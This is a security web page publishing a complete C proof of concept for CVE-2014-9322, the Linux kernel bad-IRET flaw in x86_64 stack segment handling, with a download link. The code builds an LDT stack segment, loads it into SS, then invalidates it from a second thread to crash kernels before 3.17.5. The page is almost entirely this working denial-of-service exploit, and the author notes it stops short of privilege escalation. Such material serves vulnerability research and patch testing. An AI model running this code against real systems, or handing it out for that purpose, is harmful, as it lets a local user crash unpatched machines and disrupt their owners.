You are here : Home » Exploits » cve-2014-9322 Linux Kernel D.O.S POC

cve-2014-9322 Linux Kernel D.O.S POC

D 23 February 2015     H 20:44     A Emeric Nasi     C 0 messages


agrandir
  1. /* ----------------------------------------------------------------------------------------------------
  2.  * cve-2014-9322_poc.c
  3.  *
  4.  * arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
  5.  * properly handle faults associated with the Stack Segment (SS) segment
  6.  * register, which allows local users to gain privileges by triggering an IRET
  7.  * instruction that leads to access to a GS Base address from the wrong space.
  8.  *
  9.  * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
  10.  *
  11.  * I have no merit to writing this poc, I just implemented first part of Rafal Wojtczuk article (this guy is a genius!)
  12.  * More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
  13.  *
  14.  *
  15.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c -lpthread
  16.  *
  17.  * Emeric Nasi - www.sevagas.com
  18.  *-----------------------------------------------------------------------------------------------------*/
  19.  
  20. // Only works on x86_64 platform
  21. #ifdef __x86_64__
  22.  
  23. /* ----------------------- Includes ----------------------------*/
  24. #define _GNU_SOURCE
  25. #include <stdio.h>
  26. #include <stdlib.h>
  27. #include <time.h>
  28. #include <string.h>
  29. #include <unistd.h>
  30. #include <fcntl.h>
  31. #include <sys/syscall.h>
  32. #include <sys/mman.h>
  33. #include <asm/ldt.h>
  34. #include <pthread.h>
  35. #include <sys/time.h>
  36. #include <inttypes.h>
  37. #include <stdbool.h>
  38. #include <errno.h>
  39. #include <sys/user.h>
  40.  
  41.  
  42.  
  43. /* ----------------------- definitions ----------------------------*/
  44.  
  45.  
  46. #define TARGET_KERNEL_MIN "3.0.0"
  47. #define TARGET_KERNEL_MAX "3.17.4"
  48. #define EXPLOIT_NAME "cve-2014-9322"
  49. #define EXPLOIT_TYPE DOS
  50.  
  51.  
  52. #define FALSE_SS_BASE 0x10000UL
  53. #define MAP_SIZE 0x10000
  54.  
  55.  
  56. /* ----------------------- Global variables ----------------------------*/
  57.  
  58.  
  59. struct user_desc new_stack_segment;
  60.  
  61.  
  62. /* ----------------------- functions ----------------------------*/
  63.  
  64.  
  65. /**
  66.  * Creates a new segment in Local Descriptor Table
  67.  */
  68. static bool add_ldt(struct user_desc *desc, const char *name)
  69. {
  70. if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0)
  71. {
  72. return true;
  73. }
  74. else
  75. {
  76. printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
  77. printf("modify_ldt failed, %s\n", strerror(errno));
  78. return false;
  79. }
  80. }
  81.  
  82.  
  83. int FLAG = 0;
  84.  
  85. void * segManipulatorThread(void * none)
  86. {
  87. new_stack_segment.entry_number = 0x12;
  88. new_stack_segment.base_addr = 0x10000;
  89. new_stack_segment.limit = 0xffff;
  90. new_stack_segment.seg_32bit = 1;
  91. new_stack_segment.contents = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
  92. new_stack_segment.read_exec_only = 0;
  93. new_stack_segment.limit_in_pages = 0;
  94. new_stack_segment.seg_not_present = 0;
  95. new_stack_segment.useable = 0;
  96. new_stack_segment.lm = 0;
  97.  
  98. // Create a new stack segment
  99. add_ldt(&new_stack_segment, "newSS");
  100.  
  101. // Wait for main thread to use new stack segment
  102. sleep(3);
  103.  
  104. // Invalidate stack segment
  105. new_stack_segment.seg_not_present = 1;
  106. add_ldt(&new_stack_segment, "newSS disable");
  107. FLAG = 1;
  108. sleep(15);
  109.  
  110. return NULL;
  111. }
  112.  
  113. /**
  114.  * DOS poc for cve_2014_9322 vulnerability
  115.  */
  116. int main()
  117. {
  118.  
  119. pthread_t thread1;
  120. uint8_t *code;
  121.  
  122. printf("[cve_2014_9322]: Preparing to exploit.\n");
  123.  
  124. // map area for false SS
  125. code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
  126. if (code != (uint8_t *) FALSE_SS_BASE)
  127. {
  128. fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
  129. return -1;
  130. }
  131.  
  132. printf("[cve_2014_9322]: Panic!\n");
  133. if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0)
  134. {
  135. perror("[cve_2014_9322 error]: pthread_create");
  136. return false;
  137. }
  138.  
  139. // Wait for segManipulatorThread to create new stack segment
  140. sleep(1);
  141.  
  142. // Set stack segment to newly created one in segManipulatorThread
  143. asm volatile ("mov %0, %%ss;"
  144. :
  145. :"r" (0x97)
  146. );
  147.  
  148. while(FLAG == 0){};
  149. sleep(4);
  150.  
  151. return 0;
  152. }
  153.  
  154.  
  155. #endif // __x86_64__
  156.  
  157.  

Download

Also in this section

15 December 2016 – TVT DVR/CCTV webshell exploit

11 April 2015 – cve-2014-7822 Linux Kernel D.O.S POC

24 February 2015 – cve-2014-4943 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-3631 Linux Kernel D.O.S POC

Any message or comments?
pre-moderation

This forum is moderated before publication: your contribution will only appear after being validated by an administrator.

Who are you?
Your post